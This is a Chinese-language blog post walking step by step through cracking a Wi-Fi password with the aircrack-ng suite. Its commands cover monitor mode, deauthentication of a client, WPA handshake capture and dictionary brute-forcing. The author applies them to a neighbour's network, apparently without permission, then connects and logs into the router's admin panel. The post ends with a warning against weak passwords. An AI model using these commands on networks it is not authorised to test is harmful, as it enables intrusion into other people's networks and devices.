无线攻击

记录攻击 Wi-Fi 的简单操作(成功打出密码纯属巧合)

Posted by JBNRZ on 2023-02-22
Estimated Reading Time 2 Minutes
Words 519 In Total
Viewed Times

单纯记录学习,未进行破坏行为,未泄露对方信息

配置 / 工具:

  • Kali Linux live
  • airmon-ng airodump-ng aireplay-ng aircrack-ng
  • USB 外置网卡

攻击对象

  • bssid: XX:XX:XX:XX:XX:XX

开始监听

  1. 需要网卡支持 montior
  2. 查看本机网卡信息
1
ifconfig

1
3. 启动监听模式

1
airmon-ng start wlan0

无线抓包

  1. 指定网卡
1
airodump-ng wlan0 
  1. -w <filename> 指定记录的文件主题,将产生下列文件
1
2
3
4
5
<filename>-<num>.csv
<filename>-<num>.kismet.csv
<filename>-<num>.kismet.netxml
<filename>-<num>.log.csv
<filename>-<num>.cap
  1. 存在过滤器只记录部分抓包信息
1
2
3
4
5
6
7
8
Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
--essid <essid> : Filter APs by ESSID
--essid-regex <regex> : Filter APs by ESSID using a regular
expression
-a : Filter unassociated clients

DeAuth 攻击

  1. De-authenticationFlood Attack 通过欺骗从AP到客户端单播地址的取消身份验证帧来将客户端转为未关联/未认证的状态
  2. 针对具体路由器下某个客户端进行攻击
1
aireplay-ng -0 60 -a XX:XX:XX:XX:XX:XX -c OO:OO:OO:OO:OO:OO wlan0

抓获 WPA HandShake

  1. 在进行 DeAuth Attack 同时进行监听,通过攻击将用户打掉线之后自动重连捕获连接时的握手包,进行密码爆破(也可以慢慢等有新的用户自行链接)
1
2
3
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel <num> wlan0

# 须指定信道
  1. 当出现 WPA handshake: XX:XX:XX:XX:XX:XX 时证明抓包成功
    2

爆破密码

  1. 准备大量字典(github 有很多),指定字典与流量包
1
aircrack-ng XXX.cap -w XXX.dic
  1. 接下来就是运气,很凑巧,隔壁刚好是弱密码弱密码好恐怖
    3
  2. 已经拿到密钥了,连上看看,又是很凑巧,路由器用的和我一个牌子,那么直接进入后台了怀疑是我安排的托
    4
    5

总结

千万不要用弱密码!!!
千万不要用弱密码!!!
千万不要用弱密码!!!


如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !